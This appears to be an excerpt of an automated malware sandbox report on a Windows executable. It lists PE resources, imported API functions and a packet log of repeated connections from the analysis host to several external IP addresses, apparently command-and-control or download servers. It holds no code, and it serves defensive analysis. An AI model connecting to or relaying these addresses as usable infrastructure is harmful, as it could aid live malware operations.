.rsrc	0x1c95000	0x7fe8	0x8000	c55c97f90ba612f35614fc875d3017dc	False	0.321746826171875	data	4.11911523664306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x1c985d0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4375
RT_CURSOR	0x1c98700	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.44886363636363635
RT_CURSOR	0x1c987d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x1c99680	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x1c99f28	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_CURSOR	0x1c9a4c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0x1c9b368	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0x1c9bc10	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
RT_ICON	0x1c95480	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Telugu	India	0.5368663594470046
RT_ICON	0x1c95b48	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Telugu	India	0.41358921161825724
RT_ICON	0x1c980f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Telugu	India	0.449468085106383
RT_STRING	0x1c9c438	0x650	data	Telugu	India	0.4306930693069307
RT_STRING	0x1c9ca88	0x21e	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0	Telugu	India	0.503690036900369
RT_STRING	0x1c9cca8	0x33c	data	Telugu	India	0.4613526570048309
RT_ACCELERATOR	0x1c98588	0x48	data	Telugu	India	0.8333333333333334
RT_GROUP_CURSOR	0x1c987b0	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x1c9a490	0x30	data			0.9166666666666666
RT_GROUP_CURSOR	0x1c9c178	0x30	data			0.9375
RT_GROUP_ICON	0x1c98558	0x30	data	Telugu	India	0.9375
RT_VERSION	0x1c9c1a8	0x28c	PGP symmetric key encrypted data - Plaintext or unencrypted data			0.5306748466257669

Imports

DLL	Import
KERNEL32.dll	SetEndOfFile, LocalCompact, CreateHardLinkA, LoadLibraryW, ReadConsoleInputA, FreeConsole, IsBadCodePtr, IsBadStringPtrA, GlobalUnlock, GetLastError, SetLastError, GetProcAddress, CreateJobSet, LoadLibraryA, LocalAlloc, AddAtomW, CreateEventW, HeapLock, HeapCompact, GetModuleFileNameA, GetOEMCP, GetCurrentDirectoryA, GetFileTime, Module32NextW, GetDiskFreeSpaceExW, TerminateJobObject, DebugBreak, CloseHandle, CreateFileW, FlushFileBuffers, GetStringTypeW, LCMapStringW, EnumResourceTypesW, EnumResourceNamesW, WriteConsoleW, SetStdHandle, HeapAlloc, GetModuleHandleW, ExitProcess, DecodePointer, GetCommandLineW, HeapSetInformation, GetStartupInfoW, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCurrentProcess, HeapFree, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, ReadFile, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, Sleep, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, IsValidCodePage, MultiByteToWideChar, RtlUnwind, HeapSize, HeapReAlloc, RaiseException
USER32.dll	GetMessageTime, GetKeyboardLayout, CharUpperBuffA, SetCursorPos, LoadMenuW, GetSysColorBrush, GetSystemMetrics, SetCaretPos
GDI32.dll	GetCharWidthW
ole32.dll	CoUnmarshalHresult

Possible Origin

Language of compilation system	Country where language is spoken	Map
Telugu	India

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 15, 2024 06:10:34.248936892 CEST	49713	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:34.253740072 CEST	80	49713	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:34.253952026 CEST	49713	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:34.254204988 CEST	49713	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:34.254219055 CEST	49713	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:34.258932114 CEST	80	49713	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:34.259054899 CEST	80	49713	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:36.298791885 CEST	80	49713	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:36.298947096 CEST	80	49713	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:36.299235106 CEST	49713	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:36.300698042 CEST	49713	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:36.303992987 CEST	49714	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:36.305712938 CEST	80	49713	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:36.309010029 CEST	80	49714	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:36.309137106 CEST	49714	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:36.309231997 CEST	49714	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:36.309273005 CEST	49714	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:36.314074039 CEST	80	49714	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:36.314213991 CEST	80	49714	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:37.801022053 CEST	80	49714	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:37.801079988 CEST	80	49714	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:37.801142931 CEST	49714	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:37.801366091 CEST	49714	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:37.804300070 CEST	49715	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:37.806483984 CEST	80	49714	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:37.809467077 CEST	80	49715	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:37.809592962 CEST	49715	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:37.809750080 CEST	49715	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:37.809750080 CEST	49715	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:37.814507008 CEST	80	49715	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:37.814671993 CEST	80	49715	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:39.938093901 CEST	80	49715	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:39.938148975 CEST	80	49715	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:39.938357115 CEST	49715	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:39.938658953 CEST	49715	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:39.943361998 CEST	49716	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:39.943720102 CEST	80	49715	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:39.948329926 CEST	80	49716	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:39.948457003 CEST	49716	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:39.948596954 CEST	49716	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:39.948626995 CEST	49716	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:39.953619003 CEST	80	49716	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:39.953665018 CEST	80	49716	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:41.435642958 CEST	80	49716	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:41.435794115 CEST	80	49716	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:41.435853004 CEST	49716	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:41.435982943 CEST	49716	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:41.440536022 CEST	49717	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:41.440762997 CEST	80	49716	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:41.445512056 CEST	80	49717	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:41.445615053 CEST	49717	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:41.445775032 CEST	49717	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:41.445808887 CEST	49717	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:41.450795889 CEST	80	49717	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:41.450825930 CEST	80	49717	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:43.023338079 CEST	80	49717	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:43.023364067 CEST	80	49717	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:43.023480892 CEST	49717	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:43.023610115 CEST	49717	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:43.026823044 CEST	49718	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:43.027318954 CEST	80	49717	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:43.027384043 CEST	49717	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:43.028440952 CEST	80	49717	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:43.031773090 CEST	80	49718	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:43.031877041 CEST	49718	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:43.032114983 CEST	49718	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:43.032150030 CEST	49718	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:43.036911964 CEST	80	49718	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:43.037120104 CEST	80	49718	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:44.492043018 CEST	80	49718	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:44.492182970 CEST	80	49718	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:44.492372990 CEST	49718	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:44.492670059 CEST	49718	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:44.497544050 CEST	80	49718	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:44.514404058 CEST	49719	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:44.519294024 CEST	80	49719	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:44.522689104 CEST	49719	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:44.522825956 CEST	49719	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:44.522847891 CEST	49719	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:44.527895927 CEST	80	49719	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:44.528166056 CEST	80	49719	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:46.049247980 CEST	80	49719	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:46.049344063 CEST	80	49719	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:46.049627066 CEST	49719	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:46.049777985 CEST	49719	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:46.052956104 CEST	49720	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:46.055135012 CEST	80	49719	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:46.058024883 CEST	80	49720	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:46.058119059 CEST	49720	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:46.058254957 CEST	49720	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:46.058290005 CEST	49720	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:46.063126087 CEST	80	49720	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:46.063699961 CEST	80	49720	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:47.555258989 CEST	80	49720	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:47.555396080 CEST	80	49720	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:47.555494070 CEST	49720	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:47.556673050 CEST	49720	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:47.559153080 CEST	49721	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:47.561573982 CEST	80	49720	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:47.564116001 CEST	80	49721	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:47.564222097 CEST	49721	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:47.564336061 CEST	49721	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:47.564367056 CEST	49721	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:47.569207907 CEST	80	49721	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:47.569308043 CEST	80	49721	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:49.150578976 CEST	80	49721	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:49.150791883 CEST	80	49721	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:49.150913000 CEST	49721	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:49.153671026 CEST	49721	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:10:49.154807091 CEST	49722	80	192.168.2.5	77.221.157.163
Jul 15, 2024 06:10:49.158507109 CEST	80	49721	58.151.148.90	192.168.2.5
Jul 15, 2024 06:10:49.160552025 CEST	80	49722	77.221.157.163	192.168.2.5
Jul 15, 2024 06:10:49.160660028 CEST	49722	80	192.168.2.5	77.221.157.163
Jul 15, 2024 06:10:49.160794020 CEST	49722	80	192.168.2.5	77.221.157.163
Jul 15, 2024 06:10:49.165714025 CEST	80	49722	77.221.157.163	192.168.2.5
Jul 15, 2024 06:11:08.747777939 CEST	49722	80	192.168.2.5	77.221.157.163
Jul 15, 2024 06:11:08.751810074 CEST	49724	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:08.757843018 CEST	80	49724	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:08.757961988 CEST	49724	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:08.758277893 CEST	49724	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:08.758277893 CEST	49724	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:08.764128923 CEST	80	49724	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:08.764722109 CEST	80	49724	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:10.287128925 CEST	80	49724	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:10.287780046 CEST	80	49724	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:10.288093090 CEST	49724	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:10.297884941 CEST	49724	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:10.302989006 CEST	80	49724	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:10.307291031 CEST	49725	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:10.312689066 CEST	80	49725	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:10.312787056 CEST	49725	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:10.313077927 CEST	49725	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:10.313138962 CEST	49725	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:10.318397999 CEST	80	49725	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:10.318440914 CEST	80	49725	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:11.772284031 CEST	80	49725	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:11.772937059 CEST	80	49725	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:11.773041964 CEST	49725	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:11.773101091 CEST	49725	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:11.775960922 CEST	49726	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:11.778033018 CEST	80	49725	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:11.781255007 CEST	80	49726	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:11.781347036 CEST	49726	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:11.781486034 CEST	49726	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:11.781512976 CEST	49726	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:11.786885023 CEST	80	49726	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:11.786916971 CEST	80	49726	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:13.237730026 CEST	80	49726	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:13.237889051 CEST	80	49726	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:13.237981081 CEST	49726	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:13.238073111 CEST	49726	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:13.243308067 CEST	80	49726	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:13.278589964 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:13.278697968 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:13.278840065 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:13.279483080 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:13.279505014 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.009116888 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.009443045 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.011089087 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.011148930 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.011425018 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.022291899 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.068525076 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.410192013 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.450830936 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.545480967 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.545490026 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.545568943 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.545627117 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.545689106 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.545772076 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.545820951 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.545820951 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.545854092 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.547060013 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.547077894 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.547194004 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.547194004 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.547270060 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.547333002 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.681811094 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.681869030 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.682105064 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.682106018 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.682166100 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.682238102 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.682689905 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.682737112 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.682885885 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.682885885 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.682944059 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.682996035 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.684209108 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.684257984 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.684303045 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.684317112 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.684365034 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.684365034 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.686065912 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.686105013 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.686161995 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.686172009 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.686212063 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.686227083 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.816670895 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.816715002 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.816848993 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.816884995 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.816930056 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.817456961 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.817493916 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.817662954 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.817671061 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.817724943 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.818164110 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.818186998 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.818242073 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.818252087 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.818279982 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.818300009 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.818995953 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.819020033 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.819082022 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.819092989 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.819133043 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.820022106 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.820048094 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.820092916 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.820103884 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.820132971 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.820153952 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.903309107 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.903383017 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.903481007 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.903486013 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.903516054 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.903556108 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.903600931 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.952126026 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.952163935 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.952213049 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.952251911 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.952271938 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.952295065 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.952435970 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.952457905 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.952493906 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.952501059 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.952529907 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.952548981 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.953077078 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.953100920 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.953134060 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.953140974 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.953167915 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.953180075 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.953587055 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.953636885 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.953670979 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.953682899 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.953708887 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.953741074 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.957937956 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.957962036 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.958014011 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.958039045 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.958056927 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.958091974 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.958498955 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.958522081 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.958551884 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.958559036 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.958576918 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.958600044 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.990427017 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.990494013 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.990523100 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.990559101 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.990593910 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.990607023 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:14.990660906 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.990710020 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:14.990729094 CEST	49727	443	192.168.2.5	185.149.100.242
